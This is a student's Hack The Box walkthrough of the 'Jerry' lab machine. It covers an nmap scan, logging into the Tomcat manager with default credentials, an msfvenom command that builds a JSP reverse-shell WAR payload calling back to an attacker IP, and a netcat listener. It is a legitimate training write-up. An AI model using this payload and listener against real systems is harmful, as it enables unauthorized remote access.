Edward Qiu

Computer Science Student

Hack The Box - Jerry Walkthrough

Scope

HTB Jerry Scope

Tools

Walkthrough

Let's start with a port scan to see which services are running.

nmap -sC -sV -oA nmap/initial -vvv 10.10.10.95

HTB Jerry nmap scan

We found Apache Tomcat serving HTTP on port 8080, so let's check what is being served at 10.10.10.95:8080.

HTB Jerry - Landing web page

Manager App looks interesting. Upon clicking on it, we are greeted with a login prompt.

HTB Jerry - Web login

Upon clicking cancel, we land on a 401 error page that includes an example of default credentials for Tomcat.

HTB Jerry - Web 401 Error

If we put those credentials into the login prompt from earlier, we reach the console page.

HTB Jerry - Tomcat Manager App

We see a place to upload a file, so let's use msfvenom to generate a payload that gives us a reverse shell.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.251 LPORT=44 -f war > shelle0.war

HTB Jerry - msfvenom reverse shell payload

Next we upload the payload and go to 10.10.10.95:8080/shelle0/.

HTB Jerry - Tomcat Manager App with msfvenom reverse shell payload uploaded

Then we use netcat on port 44 to get a shell.

nc -l -v -p 44

HTB Jerry - reverse shell with netcat

With some poking around, we find some logins for Tomcat.

HTB Jerry - Tomcat Users Credentials

Now if we navigate to the desktop of the Administrator account, we find the flags.

HTB Jerry - Flags

Lessons

  • Never use default credentials

Resources

Here is a list of resources I used at some point while working on Jerry:
